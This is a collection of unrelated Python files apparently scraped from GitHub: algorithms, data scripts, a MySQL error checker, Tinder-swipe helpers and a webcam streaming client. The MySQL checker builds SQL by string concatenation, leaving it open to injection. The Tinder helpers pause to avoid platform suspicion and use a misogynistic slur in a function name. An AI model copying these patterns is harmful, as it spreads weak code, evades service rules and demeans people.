setUp() already runs automatically before each test, so it is not called again here\r\n for batch_idx, data in enumerate(zip(self.s_loader, self.c_loader)):\r\n print(np.max(data[0][('rgb', 0)][0].numpy().transpose(1, 2, 0)))\r\n print(np.min(data[0][('rgb', 0)][0].numpy().transpose(1, 2, 0)))\r\n print(np.max(data[1][('rgb', 0)][0].numpy().transpose(1, 2, 0)))\r\n print(np.min(data[1][('rgb', 0)][0].numpy().transpose(1, 2, 0)))\r\n fig, (ax1, ax2) = plt.subplots(1, 2)\r\n ax1.imshow(data[0][('rgb', 0)][0].numpy().transpose(1, 2, 0))\r\n ax2.imshow(data[1][('rgb', 0)][0].numpy().transpose(1, 2, 0))\r\n plt.show()","repo_name":"BenBausch/Depth-Semantic-UDA","sub_path":"dataloaders/tests/test_diff_synthia_cityscapes.py","file_name":"test_diff_synthia_cityscapes.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"31857412344","text":"from queue import Queue\n\ngraph = {\n 'A': ['B'],\n 'B': ['A', 'C', 'H'],\n 'C': ['B', 'D'],\n 'D': ['C', 'E', 'G'],\n 'E': ['D', 'F'],\n 'F': ['E'],\n 'G': ['D'],\n 'H': ['B', 'I', 'J', 'M'],\n 'I': ['H'],\n 'J': ['H', 'K'],\n 'K': ['J', 'L'],\n 'L': ['K'],\n 'M': ['H']\n}\n# Adjacency list: for each node, every node it is directly connected to\n\n\ndef bfs(graph, root):\n visited = []\n queue = Queue()\n\n queue.put(root)\n\n while not queue.empty():\n node = queue.get()\n\n if node not in visited:\n visited.append(node)\n\n for next_node in graph[node]:\n queue.put(next_node)\n\n print(visited)\n return visited\n\n\ndef bfs_recursive(graph, queue: Queue, path):\n # Queue objects are always truthy, so test emptiness explicitly\n if queue.empty():\n return path\n\n node = queue.get()\n if node not in path:\n path.append(node)\n for next_node in graph[node]:\n queue.put(next_node)\n return bfs_recursive(graph, queue, path)\n
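\n# Usage sketch (added for illustration; root_queue is a made-up demo name):\n# the recursive variant needs its Queue pre-seeded with the root node.\n\nif __name__ == \"__main__\":\n bfs(graph, 'A')\n root_queue = Queue()\n root_queue.put('A')\n print(bfs_recursive(graph, root_queue, []))\n","repo_name":"onikss793/algo","sub_path":"sorts/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"4839364386","text":"from __main__ import app\r\nimport flask \r\nfrom forms import MyForm\r\n\r\n@app.route('/',methods=['GET','POST'])\r\ndef 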
home():\r\n\tname = None\r\n\tcvform = MyForm()\r\n\tif cvform.validate_on_submit():\r\n\t\tname = cvform.name.data\r\n\t\tcvform.name.data = ''\r\n\r\n\treturn flask.render_template('index.html', form = cvform,user_class = 'white' )\r\n\r\nprint('routes')","repo_name":"MiniManch/DI_Bootcamp","sub_path":"Week-12/Day-2/Daily-Challenge/app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"22591231299","text":"import mysql.connector\nfrom mysql.connector import Error\nfrom datetime import datetime\nimport logging\n\n\ndef insertTableData(err, sample, machine):\n sql = \"INSERT INTO table (event,sample,time,done,file,machine) VALUES (%s,%s,%s,%s,%s,%s);\"\n val = (err, sample, datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 0, \"none\", machine)\n try:\n connection = mysql.connector.connect(host='host', database='database', user='user',\n password='password')\n if connection.is_connected():\n with open('Errorlog.log') as f:\n if str(err) + \" | \" + str(sample) + \" | \" + str(machine) + \"\\n\" in f.read():\n # this error was already logged once, so skip the INSERT\n cursor = connection.cursor()\n else:\n logging.error(str(err) + \" | \" + str(sample) + \" | \" + str(machine) + \"\\n\")\n cursor = connection.cursor()\n cursor.execute(sql, val)\n connection.commit()\n except Error as e:\n logging.error(\"Error while connecting to MySQL\", e)\n finally:\n if connection.is_connected():\n cursor.close()\n connection.close()\n\n\ndef checkDuplicateSample():\n try:\n connection = mysql.connector.connect(host='host',\n database='database',\n user='user',\n password='password')\n if connection.is_connected():\n cursor = connection.cursor()\n cursor.execute(\n \"SELECT sample_id, COUNT(sample_id) FROM table GROUP BY sample_id HAVING COUNT(sample_id) > 1;\")\n record = cursor.fetchall()\n for sample in record:\n if \"EMPTY\" in sample:\n continue\n cursor = connection.cursor()\n cursor.execute(\"SELECT machine FROM table WHERE sample_id = '\" + sample[0] + \"';\")\n rec = cursor.fetchall()\n try:\n machine = \"MACHINE_\" + str(rec[0][0]) + \" | \" + \"MACHINE_\" + str(rec[1][0])\n except:\n # only one machine returned; repeat it as the fallback\n machine = \"MACHINE_\" + str(rec[0][0]) + \" | \" + \"MACHINE_\" + str(rec[0][0])\n insertTableData(\"duplicate sample ID\", sample[0], machine)\n except Error as e:\n logging.error(\"Error while connecting to MySQL\", e)\n finally:\n if connection.is_connected():\n cursor.close()\n connection.close()\n\n\ndef checkDuplicatePlate():\n try:\n connection = mysql.connector.connect(host='host',\n database='database',\n user='user',\n password='password')\n if connection.is_connected():\n cursor = connection.cursor()\n cursor.execute(\"SELECT DISTINCT(plate_id) FROM table;\")\n record = cursor.fetchall()\n for plate in record:\n if \"EMPTY\" in plate:\n continue\n cur = connection.cursor()\n cur.execute(\"SELECT max(DISTINCT run) FROM table WHERE plate_id = '\" + str(plate[0]) + \"';\")\n rec = cur.fetchall()\n cu = connection.cursor()\n cu.execute(\n \"SELECT DISTINCT(plate_id), COUNT(plate_id) FROM table WHERE plate_id = '\" + str(\n plate[0]) + \"' GROUP BY plate_id HAVING COUNT(plate_id) >\" + str(\n rec[0][0] * 93) + \";\")\n rem = cu.fetchall()\n curs = connection.cursor()\n try:\n curs.execute(\"SELECT DISTINCT machine FROM table WHERE plate_id = '\" + str(rem[0][0]) + \"';\")\n except:\n continue\n re = curs.fetchall()\n try:\n machine = \"MACHINE_\" + str(re[0][0]) + \" | \" + \"MACHINE_\" + str(re[1][0])\n except:\n machine = \"MACHINE_\" + str(re[0][0]) + \" | \" + \"MACHINE_\" + str(re[0][0])\n insertTableData(\"duplicate plate ID\", rem[0][0], machine)\n except Error as e:\n logging.error(\"Error while connecting to MySQL\", e)\n finally:\n if connection.is_connected():\n cursor.close()\n connection.close()\n\n\nif __name__ == '__main__':\n logging.basicConfig(filename=\"Errorlog.log\", level=logging.ERROR)\n checkDuplicateSample()\n checkDuplicatePlate()\n","repo_name":"momongoose/PythonScripts","sub_path":"ErrorCheckerDB.py","file_name":"ErrorCheckerDB.py","file_ext":"py","file_size_in_byte":4553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"}
+{"seq_id":"32702185502","text":"from app.models import db, User, Friend, environment, SCHEMA\nfrom sqlalchemy import or_, and_\n\ndef seed_friends():\n users = User.query.all()[:5]\n\n for i in range(len(users)):\n user1 = users[i]\n for j in range(len(users)):\n if j != i:\n user2 = users[j]\n friendship = Friend.query.filter(\n or_(and_(Friend.from_user_id == user1.id, Friend.to_user_id == user2.id),\n and_(Friend.from_user_id == user2.id, Friend.to_user_id == user1.id))).first()\n if not friendship:\n is_confirmed = j % 2 == 0\n friend = Friend(\n from_user_id= user1.id,\n to_user_id = user2.id,\n is_confirmed=is_confirmed\n )\n db.session.add(friend)\n \n db.session.commit()\n\n\n# Uses a raw SQL query to TRUNCATE or DELETE the users table. SQLAlchemy doesn't\n# have a built in function to do this. With postgres in production TRUNCATE\n# removes all the data from the table, and RESET IDENTITY resets the auto\n# incrementing primary key, CASCADE deletes any dependent entities. With\n# sqlite3 in development you need to instead use DELETE to remove all data and\n# it will reset the primary keys for you as well.\ndef undo_friends():\n if environment == \"production\":\n db.session.execute(\n f\"TRUNCATE table {SCHEMA}.friends RESTART IDENTITY CASCADE;\")\n else:\n db.session.execute(\"DELETE FROM friends\")\n\n db.session.commit()\n","repo_name":"OneBoatFly/venmo-clone","sub_path":"app/seeds/friends.py","file_name":"friends.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"}
+{"seq_id":"40960055015","text":"import csv\r\nimport multiprocessing\r\nimport os\r\nimport pickle\r\nimport shutil\r\n\r\nimport numpy as np\r\nimport xlrd\r\nimport cas_util as CAS\r\n\r\ndef read_casme2_video(video_path):\r\n start_sub, end_sub = 3, -4 # drop the first 2 and the last 3 frames\r\n files = [i for i in os.listdir(video_path) if 'jpg' in i]\r\n files.sort(key=lambda x: int(x[start_sub:end_sub]))\r\n files = [os.path.join(video_path, i) for i in files]\r\n return files\r\n\r\ndef read_casme2_label(label_path, fps):\r\n # macro-expressions last 39 frames on average (at 30 fps)\r\n mic_default_d = int(fps * 2 / 3)\r\n\r\n data_xls = xlrd.open_workbook(label_path)\r\n table_xls = data_xls.sheets()[0]\r\n\r\n labels = {}\r\n s = [15, 16, 19, 20, 21, 22, 23, 24, 25, 26, 27, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 40]\r\n dir = {\"disgust1\": \"0101\", \"disgust2\": \"0102\", \"anger1\": \"0401\", \"anger2\": \"0402\", \"happy1\": \"0502\",\r\n \"happy2\": \"0503\", \"happy3\": \"0505\", \"happy4\": \"0507\", \"happy5\": \"0508\"}\r\n # for i_row in table_xls:\r\n # key = i_row[10].value\r\n for i_row in table_xls.get_rows():\r\n snum = s[int(i_row[0].value) - 1]\r\n cla = i_row[1].value.split(\"_\")[0]\r\n clanum = dir[cla]\r\n subnum = str(snum) + '_' + clanum # 15_0401\r\n # print(subnum)\r\n key 
= subnum\r\n if key not in labels:\r\n labels[key] = []\r\n labels[key].append([int(i_cell.value) for i_cell in i_row[2:5]])\r\n\r\n labels = {k: np.array([[i_row[0], i_row[2] if i_row[2] else i_row[1] + mic_default_d] for i_row in v])\r\n for k, v in labels.items()}\r\n return labels\r\ndef metrics(label_slice, predict_slice, mic_frame, dataset_root_path, debug_message=True):\r\n n_pre_micro = int(((predict_slice[:, 1] - predict_slice[:, 0]) <= mic_frame).sum()) if predict_slice.shape[0] else 0\r\n # intervals no longer than mic_frame count as micro-expressions\r\n tp = 0\r\n tp_mic = 0\r\n\r\n # labels are 1-based while predictions are 0-based, so shift the predictions\r\n predict_slice += 1\r\n\r\n FPPP = []\r\n for label_start, label_end in label_slice.tolist():\r\n percent = 0\r\n for j, (predict_start, predict_end) in enumerate(predict_slice.tolist()):\r\n if not (predict_end < label_start or predict_start > label_end):\r\n\r\n all_points = sorted([label_start, label_end, predict_start, predict_end])\r\n percent = (float(all_points[2] - all_points[1])) / (all_points[3] - all_points[0])\r\n\r\n if percent >= 0.5:\r\n tp += 1\r\n # !!!!! note: a TP counts as micro when the label interval itself is shorter than mic_frame\r\n if label_end - label_start <= mic_frame: # !!!!!!!!!! micro labels are decided by interval length (mic_frame), not by the excel annotation\r\n tp_mic += 1\r\n FPPP.append(j)\r\n if debug_message:\r\n print(f'label:{label_start},{label_end} test:{predict_start},{predict_end} percent={percent}')\r\n\r\n with open('./valcas^2re/valcas_sqr.csv', 'a', newline='') as f:\r\n writer = csv.writer(f)\r\n writer.writerow([dataset_root_path, label_start, label_end, predict_start, predict_end, 'TP'])\r\n break\r\n\r\n if percent < 0.5: # this gt interval has IoU < 0.5 with every predicted interval\r\n if debug_message:\r\n print(f'label:{label_start},{label_end} has no matching prediction')\r\n with open('./valcas^2re/valcas_sqr.csv', 'a', newline='') as f:\r\n writer = csv.writer(f)\r\n writer.writerow([dataset_root_path, label_start, label_end, '', '', 'FN'])\r\n\r\n FPPP = list(set(FPPP))\r\n for j, (predict_start, predict_end) in enumerate(predict_slice):\r\n if j not in FPPP:\r\n with open('./valcas^2re/valcas_sqr.csv', 'a', newline='') as f:\r\n writer = csv.writer(f)\r\n writer.writerow([dataset_root_path, '', '', predict_start, predict_end, 'FP'])\r\n\r\n return tp, tp_mic, len(label_slice), len(predict_slice), n_pre_micro\r\n\r\ndef casme2_worker(sub, i_worker, debug_message=False):\r\n # dataset_root_path = \"D:/graduate/medata/casmesqr/rawpic\"\r\n # # 'C:\\\\sheng\\\\casme2\\\\rawpic'\r\n # label_path = \"D:/graduate/medata/casmesqr/CAS(ME)^2code_final(Updated).xlsx\"\r\n dataset_root_path = '/space0/qinwf/MEdata/casmesqr/rawpic'#'/space0/qinwf/MEdata/openface_cas^2'#\r\n #\"/space0/qinwf/DATA/casmesqr/rawpic\"\r\n # \"D:/graduate/medata/casmesqr/rawpic\"\r\n label_path = '/space0/qinwf/MEdata/casmesqr/CAS(ME)^2code_final(Updated).xlsx'\r\n #\"/space0/qinwf/DATA/casmesqr/CAS(ME)^2code_final(Updated).xlsx\"\r\n # 'CAS(ME)^2code_final.xls'\r\n\r\n fps = 30\r\n mic_frame = fps // 2 # 15 frames; labels under 15 frames (0.5 s) count as micro; all <=15 in the excel are mic\r\n result = []\r\n\r\n sub_path = os.path.join(dataset_root_path, sub)\r\n videos = os.listdir(sub_path)\r\n labels = read_casme2_label(label_path, fps)\r\n for i_video in videos:\r\n # CAS(ME)^2\r\n #files = read_casme2_video(os.path.join(dataset_root_path, sub, i_video))#s15\\15_0101disgustingteeth\r\n predict = CAS.draw_roiline19(sub_path , i_video , 3, -4,1)\r\n pp=predict.tolist()\r\n vionum = i_video[0:7] # 15_0101\r\n print(\"vionum:{}\".format(vionum))\r\n print(\"this vio predicted intervals:{}\".format(pp)) # all predicted intervals for this video\r\n if vionum not in labels.keys(): # !!! 115_0508 has no label in the excel (happy5)\r\n print(\"excel without label:{}\".format(vionum))\r\n continue\r\n gt = labels[vionum]\r\n print(\"this vio gt intervals:{}\".format(gt))\r\n\r\n i_video_relative = sub + '_' + i_video\r\n # gt = labels[i_video_relative] if i_video_relative in labels else np.array([])\r\n result.append(metrics(gt, predict, mic_frame, i_video_relative))\r\n\r\n result = [np.array([j[i] for j in result]).sum(axis=0) for i in range(5)]\r\n\r\n with open(f'./valcas^2re/casmesqr_{i_worker}.pkl', 'wb') as f:\r\n pickle.dump(result, f)\r\n # pickle serializes the result object to a file for permanent storage, so it\r\n # can simply be reloaded later instead of being recomputed from scratch\r\n\r\n if debug_message:\r\n print(f'{i_worker} finished')\r\ndef report(n_gt, n_pred, tp, prefix='', show_message=True):\r\n precision = tp / n_pred\r\n recall = tp / n_gt\r\n f1 = (2 * precision * recall) / (precision + recall)\r\n\r\n if show_message:\r\n print('------------------')\r\n print(f\"{prefix}precision: {precision}\")\r\n print(f\"{prefix}recall: {recall}\")\r\n print(f\"{prefix}F1 score: {f1}\")\r\n # print(f\"{prefix}precision: {','.join([f'{i:20}' for i in precision])}\")\r\n # print(f\"{prefix}recall: {','.join([f'{i:20}' for i in recall])}\")\r\n # print(f\"{prefix}F1 score: {','.join([f'{i:20}' for i in f1])}\")\r\n return precision, recall, f1\r\ndef main_casme2(show_message=True):\r\n dataset_root_path = \"/space0/qinwf/MEdata/casmesqr/rawpic\"\r\n #\"/space0/qinwf/DATA/casmesqr/rawpic\"\r\n #\"D:/graduate/medata/casmesqr/rawpic\"\r\n sub_list = os.listdir(dataset_root_path)#s15 s16 s19...\r\n # sub_list =['s15','s16']\r\n n_result = len(sub_list)#22\r\n n_worker = min(25, n_result)\r\n #\r\n pool = multiprocessing.Pool(n_worker) # one worker process per subject (22 subjects)\r\n for i_worker, i_sub in enumerate(sub_list):\r\n pool.apply_async(casme2_worker, (i_sub, i_worker))\r\n # apply_async is asynchronous and non-blocking; workers run concurrently under the scheduler\r\n pool.close()\r\n pool.join()\r\n\r\n gather_result = []\r\n for i_worker in range(n_result):\r\n with open(f'./valcas^2re/casmesqr_{i_worker}.pkl', 'rb') as f:\r\n gather_result.append(pickle.load(f))\r\n\r\n tp = np.array([i[0] for i in gather_result]).sum(axis=0)\r\n tp_mic = np.array([i[1] for i in gather_result]).sum(axis=0)\r\n tp_mac = tp-tp_mic\r\n n_gt = np.array([i[2] for i in gather_result]).sum(axis=0)\r\n n_pred = np.array([i[3] for i in gather_result]).sum(axis=0)\r\n n_pred_mic = np.array([i[4] for i in gather_result]).sum(axis=0)\r\n n_pred_mac = n_pred - n_pred_mic\r\n\r\n n_gt_mic = 57\r\n\r\n n_gt_mac = 300\r\n if show_message:\r\n print('-------------------------')\r\n\r\n print(f'{tp} correct detections in total, of which {tp_mic} are correct micro-expression detections')\r\n print('-------------------------')\r\n print(f'{n_gt} ground-truth expressions in total')\r\n print(f'{n_pred} intervals predicted in total')\r\n print(f'{n_pred_mac} predicted macro-expressions')\r\n print(f'{n_pred_mic} predicted micro-expressions')\r\n\r\n report(n_gt, n_pred, tp, '', show_message=show_message)\r\n report(n_gt_mac, n_pred_mac, tp_mac, 'macro ', show_message=show_message)\r\n report(n_gt_mic, n_pred_mic, tp_mic, 'micro ', show_message=show_message)\r\nif __name__ == '__main__':\r\n main_casme2()","repo_name":"qin123xyz/MEGC2023_macro-and-micro-expression-spotting","sub_path":"megc2023code/val_cas^2util_0.4066/val_cas^2.py","file_name":"val_cas^2.py","file_ext":"py","file_size_in_byte":9025,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"}
+{"seq_id":"69914652247","text":"from datetime import date\r\nfrom random import random\r\nfrom time import sleep\r\n\r\n\r\ndef calculate_age(birthday_string):\r\n \"\"\"\r\n Converts from 
'1997-03-25T22:49:41.151Z' to an integer (age)\r\n \"\"\"\r\n birthyear = int(birthday_string[:4])\r\n birthmonth = int(birthday_string[5:7])\r\n birthday = int(birthday_string[8:10])\r\n today = date.today()\r\n return today.year - birthyear - ((today.month, today.day) < (birthmonth, birthday))\r\n\r\n\r\ndef pause():\r\n \"\"\"\r\n In order to appear as a real Tinder user using the app...\r\n When making many API calls, it is important to pause a...\r\n realistic amount of time between actions to not make Tinder...\r\n suspicious!\r\n \"\"\"\r\n nap_length = 3 * random()\r\n print('Napping for %f seconds...' % nap_length)\r\n sleep(nap_length)\r\n\r\n\r\nNUMS = [\"ⳊꚨI\", \"Oཏꗚ\", \"ອꚨI\", \"ອꚨl\", \"ອךI\", \"9ገI\", \"ꏿཏꕃ\", \"WhatsApp\", \"Whatsap\"]\r\n\r\n\r\ndef check_sluts(rec):\r\n for num in NUMS:\r\n if rec['user'].get('jobs') and num in rec['user'].get('jobs')[0]['title']['name']:\r\n return True\r\n if num in rec['user']['name'] or num in rec['user']['bio']:\r\n return True\r\n if num in rec.get('teaser')['string']:\r\n return True\r\n return False\r\n","repo_name":"DmitriiDenisov/tinder_swipe","sub_path":"utils/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"5380818432","text":"# Uses python3\nimport random\nfrom math import sqrt\n\n\ndef get_distance(point1, point2):\n if point1 is None or point2 is None:\n return None\n else:\n return sqrt(\n (point1[0] - point2[0]) ** 2\n +\n (point1[1] - point2[1]) ** 2\n )\n\n\ndef get_xdistance(point1, point2):\n if point1 is None or point2 is None:\n return None\n else:\n return abs(point1[0] - point2[0])\n\n\ndef get_ydistance(point1, point2):\n if point1 is None or point2 is None:\n return None\n else:\n return abs(point1[1] - point2[1])\n\n\ndef get_min_distance_naive(points, return_points=None):\n closest_points = None\n min_distance = None\n n = len(points)\n\n for i in range(n):\n for j in range(i + 1, n):\n point2 = points[j]\n point1 = points[i]\n distance = get_distance(point1, point2)\n if min_distance is None or distance < min_distance:\n min_distance = distance\n closest_points = (point1, point2)\n if return_points:\n return min_distance, closest_points\n else:\n return min_distance # , closest_points\n
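\n# Quick usage sketch (added for illustration; _demo_points is a made-up name):\n# on this tiny input the naive O(n^2) scan returns sqrt(2), for the pair\n# (0, 0)-(1, 1) -- the first pair found at the minimum distance.\n# _demo_points = [(0, 0), (1, 1), (2, 2), (5, 0)]\n# get_min_distance_naive(_demo_points, return_points=1) == (sqrt(2), ((0, 0), (1, 1)))\n\n\ndef get_inter_min(points, min_init, verbose=None):\n n_points = len(points)\n dist_min = min_init\n if verbose:\n print(\n \"[get_inter_min][start] dist_min={} points={}\".format(\n dist_min,\n points\n )\n )\n for i in range(n_points):\n for j in range(i + 1, 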
n_points):\n dist_y = get_ydistance(points[i], points[j])\n dist = get_distance(points[i], points[j])\n if verbose:\n print(\n \"[get_inter_min][loop] points={} dist={} dist_min\".format(\n (points[i], points[j]), dist, dist_min\n )\n )\n\n if dist_y > dist_min:\n break\n if dist_min is None or dist < dist_min:\n dist_min = dist\n\n if verbose:\n print(\n \"[get_inter_min][finish] min={}\".format(\n dist_min\n )\n )\n return dist_min\n\n\ndef get_reccursion(points_x, points_y, verbose=None):\n n_points = len(points_x)\n if verbose:\n print(\"get_reccursion: start: points_x={} points_y={}\".format(points_x,points_y))\n if n_points <= 3:\n if verbose:\n print(\"get_reccursion: n={}<=4\".format(n_points))\n d_min = get_min_distance_naive(points_x)\n if verbose:\n print(\"get_reccursion: d_min={}\".format(d_min))\n return d_min\n else:\n idx_mid = n_points // 2\n point_mid = points_x[idx_mid]\n left_x = points_x[:idx_mid+1]\n right_x = points_x[idx_mid+1:]\n left_y = []\n right_y = []\n for p in points_y:\n if p[0] <= point_mid[0]:\n left_y.append(p)\n else:\n right_y.append(p)\n if verbose:\n print(\n \"get_reccursion: left_x={} right_x={}\".format(\n left_x, right_x\n )\n )\n print(\n \"get_reccursion: left_y={} right_y={}\".format(\n left_y, right_y\n )\n )\n left_min = get_reccursion(left_x, left_y,verbose)\n right_min = get_reccursion(right_x, right_y,verbose)\n if left_min is not None and right_min is not None:\n d_min = min(left_min,right_min)\n elif left_min is not None:\n d_min = left_min\n elif right_min is not None:\n d_min = right_min\n else:\n d_min = None\n points_inter = [p for p in points_y if get_xdistance(p, point_mid) <= d_min]\n inter_min = get_inter_min(points_inter, d_min, verbose=verbose)\n if verbose:\n print(\"get_reccursion: d_min={} inter_min={}\".format(d_min,inter_min))\n if inter_min is None:\n return d_min\n else:\n return min(d_min, inter_min)\n\n\ndef get_min_distance(points,verbose=None):\n points_x = sorted(points, key=lambda x: x[0])\n points_y = sorted(points, key=lambda x: x[1])\n return get_reccursion(points_x, points_y,verbose)\n\n\ndef stress_test(n_trials=1000):\n \"\"\"\n :param n_trials:\n :return:\n \"\"\"\n for _ in range(n_trials):\n length = random.randint(5, 20)\n points = [\n (random.randint(0, 10), random.randint(0, 10))\n for _ in range(length)\n ]\n expected = get_min_distance_naive(points)\n actual = get_min_distance(points,False)\n msg = \"{}=={} {}\".format(expected, actual, points)\n assert expected == actual, msg\n\n\ndef test1():\n \"\"\"\n assert expected == actual, msg\n AssertionError: 1.0==1.4142135623730951 [(6, 9), (7, 4), (9, 9), (1, 5), (10, 4), (9, 0), (8, 8), (7, 2), (9, 6), (4, 8), (4, 9)]\n \"\"\"\n points = [(6, 9), (7, 4), (9, 9), (1, 5), (10, 4), (9, 0), (8, 8), (7, 2), (9, 6), (4, 8), (4, 9)]\n\n print(get_min_distance(points, verbose=1), get_min_distance_naive(points))\n\ndef test2():\n \"\"\"\n assert expected == actual, msg\n AssertionError: 1.4142135623730951==2.23606797749979 [(1, 5), (9, 6), (9, 10), (3, 1), (8, 7), (6, 6)]\n :return:\n \"\"\"\n points = [(1, 5), (9, 6), (9, 10), (3, 1), (8, 7), (6, 6)]\n print(get_min_distance(points, verbose=1), get_min_distance_naive(points))\n\ndef test3():\n \"\"\"\n assert expected == actual, msg\nAssertionError: 1.4142135623730951==2.23606797749979 [(1, 5), (9, 6), (9, 10), (3, 1), (8, 7), (6, 6)]\n :return:\n \"\"\"\n points = [(1, 5), (9, 6), (9, 10), (3, 1), (8, 7), (6, 6)]\n print(get_min_distance(points, verbose=1), 
get_min_distance_naive(points,return_points=1))\n\n\ndef run_interactive():\n n = int(input())\n points = []\n for _ in range(n):\n point = [int(x) for x in input().split()]\n points.append(point)\n print(get_min_distance(points))\n\n\nif __name__ == '__main__':\n # stress_test()\n # test3()\n run_interactive()\n","repo_name":"roman-4erkasov/coursera-data-structures-algorithms","sub_path":"prj01_algorithmic_toolbox/week04wrk06_closest_points_reccursive.py","file_name":"week04wrk06_closest_points_reccursive.py","file_ext":"py","file_size_in_byte":6030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"624718199","text":"from sklearn.model_selection import train_test_split\n\nimport pandas as pd\n\nimport typer\n\n\ndef main(raw_data_inpath: str, train_data_outpath: str, test_data_outpath: str) -> None:\n raw_df = pd.read_parquet(raw_data_inpath)\n print(f\"Load raw data from {raw_data_inpath}\")\n\n train_df, test_df = train_test_split(\n raw_df, test_size=0.3, stratify=raw_df[\"target\"], random_state=123\n ) # Stratifying by 'target' column helps maintain class distribution in both training and testing sets.\n\n train_df.to_parquet(train_data_outpath)\n print(f\"Save train data to {train_data_outpath}\")\n\n test_df.to_parquet(test_data_outpath)\n print(f\"Save test data to {test_data_outpath}\")\n\n\nif __name__ == \"__main__\":\n typer.run(main)\n","repo_name":"nstrande/selfregulated_threshold_ml_classifier","sub_path":"src/steps/get_train_test_data.py","file_name":"get_train_test_data.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4910353656","text":"from .COPExObject import *\r\nfrom .MemStream import *\r\nfrom .CoordLL84 import *\r\nfrom .KeyValueManager import *\r\n\r\n\r\nclass MultiSymbolObject(COPExObject):\r\n CLSID = \"{C1FD308D-CE83-4294-855C-2613F97CC7B4}\"\r\n\r\n def __init__(self):\r\n COPExObject.__init__(self)\r\n\r\n def read_object(self, byte_data):\r\n ms = MemStream(byte_data)\r\n # read version\r\n version = ms.read_dword()\r\n if version == 0x0200:\r\n # strings are UTF8 coded\r\n\r\n # cgm data can be ignored (read, but do not use)\r\n ms.read_bytes()\r\n\r\n lat, lng, hgt = ms.read_coordinate()\r\n self.coords = []\r\n self.coords.append(CoordLL84(lat, lng, hgt))\r\n\r\n self.symbol_string = ms.read_string().decode('latin-1')\r\n self.display_name = ms.read_string().decode('latin-1')\r\n elif version == 0x0100:\r\n # strings are ASCII coded\r\n\r\n # cgm data can be ignored (read, but do not use)\r\n ms.read_bytes()\r\n\r\n lat, lng, hgt = ms.read_coordinate()\r\n self.coords = []\r\n self.coords.append(CoordLL84(lat, lng, hgt))\r\n\r\n self.symbol_string = ms.read_string().decode('latin-1')\r\n self.display_name = ms.read_string().decode('latin-1')\r\n\r\n def __str__(self):\r\n str_ret = \"\"\r\n\r\n kvm = KeyValueManager(';')\r\n kvm.set_key_value_string(self.get_symbol_string())\r\n\r\n keys = [\"LANGUAGE\", \"GZ\", \"ZZ0\", \"ZZ1\", \"ZZ2\", \"ZZ3\"]\r\n for key in keys:\r\n str_ret += key + \": \" + kvm.get_value(key) + \"\\n\"\r\n\r\n return str_ret\r\n","repo_name":"kadas-albireo/kadas-ovl-plugin","sub_path":"kadas_ovl/copexreader/COPEx/MultiSymbolObject.py","file_name":"MultiSymbolObject.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19294117051","text":"# -*- coding:cp949 
-*-\n\nimport cv2\nimport socket\nimport struct\nimport pickle\nimport threading\nimport time\n\n# print a warning telling the user to drink water\ndef alarm(client_socket):\n flag = 0\n while True:\n water = client_socket.recv(100).decode() # receive from the NX board whether a water bottle was detected\n if int(water) == 1: # if no bottle was detected\n print(\"Please drink some water\") # warn the user to drink\n flag = 1\n elif int(water) == 0: # if a bottle was detected\n if flag == 1:\n print(\"Clearing the alert\") # stop warning\n flag = 0\n \n \nip = '114.70.23.41' # IP address\nport = 5050 # port number\n\n# create the socket object and connect\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient_socket.connect((ip, port))\nprint('Connected')\n\n# select the camera\ncamera = cv2.VideoCapture(0)\n\n# set the frame size\ncamera.set(cv2.CAP_PROP_FRAME_WIDTH, 640); # width\ncamera.set(cv2.CAP_PROP_FRAME_HEIGHT, 480); # height\n\n# encoding parameters\n# for jpg, cv2.IMWRITE_JPEG_QUALITY sets the image quality\nencode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 90]\n\n# thread that prints the warnings\nthread = threading.Thread(target = alarm, args = (client_socket, ))\nthread.start()\n\nwhile True:\n ret, frame = camera.read() # read a camera frame\n frame = cv2.flip(frame, 1)\n cv2.imshow('check', frame)\n result, frame = cv2.imencode('.jpg', frame, encode_param) # encode the frame\n # serialization: laying out an object's data as a stream so it can be stored or transmitted efficiently\n # binary file: contains data encoded in binary form for computer storage and processing\n data = pickle.dumps(frame, 0) # serialize the frame into binary data\n size = len(data)\n # print(\"Frame Size : \", size) # print the frame size\n\n \n # send the data (frame)\n client_socket.sendall(struct.pack(\">L\", size) + data)\n # print(struct.pack(\">L\", size) + data)\n\n if cv2.waitKey(1) == ord('q') : # press q to quit\n cv2.destroyAllWindows()\n break\n \n \n# release resources\ncamera.release()","repo_name":"ech97/blinkCapture","sub_path":"src/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
